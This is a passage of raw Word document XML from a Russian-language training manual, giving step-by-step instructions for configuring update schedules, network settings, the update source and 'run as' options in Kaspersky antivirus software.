                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId219" r:link="rId282">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72" w:name="_Toc3811364"/>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Задание 4. Настройка обновления</w:t>
      </w:r>
      <w:bookmarkEnd w:id="172"/>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>В этом задании нужно ознакомиться с настройками по умолчанию для з</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">дачи получения обновлений и при необходимости внести в них изменения (в соответствии с использующимися на Вашем компьютере настройками сети). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="132"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Откройте главное окно интерфейса и перейдите к подразделу </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>О</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>б</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>новление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33" name="Рисунок 133" descr="http://www.intuit.ru/department/security/antiviruskasp/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intuit.ru/department/security/antiviruskasp/14/5-1.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId283" r:link="rId284">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Откройте окно настройки, нажав на группу "</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Настройка</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="132"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Откроется окно </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Настройка</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, причем сразу на подразделе </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Обновл</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ние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008120" cy="3284220"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="134" name="Рисунок 134" descr="http://www.intuit.ru/department/security/antiviruskasp/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intuit.ru/department/security/antiviruskasp/14/5-2.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId285" r:link="rId286">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tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Все настройки обновления, размещенные в правой части, разделены на три группы: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="132"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Режим запуска</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> - расписание, с которым будет запускаться проц</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">дура обновления. Предлагается выбрать один из трех вариантов: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="132"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Автоматически</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Это означает, что процедура получения новых файлов будет запускаться через промежутки времени, указанные в самих о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>б</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>новлениях. Таким образом, решение о необходимости участить или наоборот, увеличить интервал между загрузками новых обновлений остается за вирусн</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ы</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ми экспертами </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Лаборатории Касперского</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Это - оптимальный сценарий для большинства пользователей, у которых открыт постоянный доступ в Интернет. Поэтому именно его предлагается использовать по умолчанию </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="132"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Каждый 1 день</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Если выбрать этот сценарий, то с помощью расп</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ложенной рядом кнопки можно задать подробное расписание (в том числе и раз в час, и каждый определенный день недели), когда должна запускаться проц</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>дура обновления. Этот способ рекомендуется использовать если доступ к сети Интернет ограничен и пользователь заранее знает, когда он может выделить н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">сколько минут на загрузку новых баз </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2217420" cy="2065020"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="135" name="Рисунок 135" descr="http://www.intuit.ru/department/security/antiviruskasp/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intuit.ru/department/security/antiviruskasp/14/5-3.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId287" r:link="rId288">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2217420" cy="20650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2"/>
          <w:numId w:val="132"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Вручную</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Этот режим предназначен для случая, когда о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>б</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>новление необходимо получать без использования всемирной сети - например, передавая файлы по сети или с помощью мобильных носителей. Такой способ может и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>пользоваться при очень ограниченном канале связи с Интернет или при его о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>сутствии</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="132"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Параметры обновления</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> определяют какие файлы будут загр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">жаться и какие настройки сети нужно при этом использовать. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="132"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Перейдите к окну настройки сетевых параметров, нажав кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Настройка</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Открывшееся окно </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Настройка обновления</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> содержит три закладки. На первой, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Параметры LAN</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>задаются параметры соединения с Интернет. Их можно узнать у провайдера, администратора компьютерного класса или преп</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">давателя. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2918460" cy="2903220"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="136" name="Рисунок 136" descr="http://www.intuit.ru/department/security/antiviruskasp/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intuit.ru/department/security/antiviruskasp/14/5-4.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId289" r:link="rId290">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2918460" cy="2903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 xml:space="preserve">Перейдите к закладке </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Источник обновления</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Источник обновления - это еще один важный параметр задачи получения обновлений. По умолчанию обновления загружаются с серверов </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Лаборатории Касперского</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Их адреса фиксированы разработчиками программы и измен</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">нию не подлежат. Серверам обновлений </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Лаборатории Касперского</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> соотве</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ствует одноименный пункт в списке всех источников. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2918460" cy="2903220"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="137" name="Рисунок 137" descr="http://www.intuit.ru/department/security/antiviruskasp/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intuit.ru/department/security/antiviruskasp/14/5-5.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId291" r:link="rId292">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2918460" cy="2903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 xml:space="preserve">Перейдите к закладке </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Дополнительно</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="132"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Ознакомьтесь с представленными на ней полями, обратив внимание на группу </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Копировать в папку</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Эта настройка может быть полезна в случае, когда только Ваш компьютер имеет доступ в Интернет, а другие компьютеры сети - нет. В этом случае можно настроить автоматическое копирование файлов обновлений, полученных В</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">шим антивирусом, в определенный каталог. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Тогда эту папку можно будет ук</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>зать в качестве источника обновлений в настройках остальных компьютеров с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ти.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Настройка </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Запуск от имени</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> может быть необходима в случае, если уче</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ная запись системы Вашего компьютера не обладает достаточными правами на доступ к источнику обновления, например сетевой папке. В этом случае нужно отметить флаг </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Запуск от имени</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, узнать у системного администратора сети или преподавателя имя учетной записи, обладающей такими правами, и ее пароль и заполнить одноименные поля</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2918460" cy="2903220"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="138" name="Рисунок 138" descr="http://www.intuit.ru/department/security/antiviruskasp/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intuit.ru/department/security/antiviruskasp/14/5-9.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId293" r:link="rId294">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2918460" cy="2903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 xml:space="preserve">Закройте окно настройки обновлений, нажав </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ОК</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
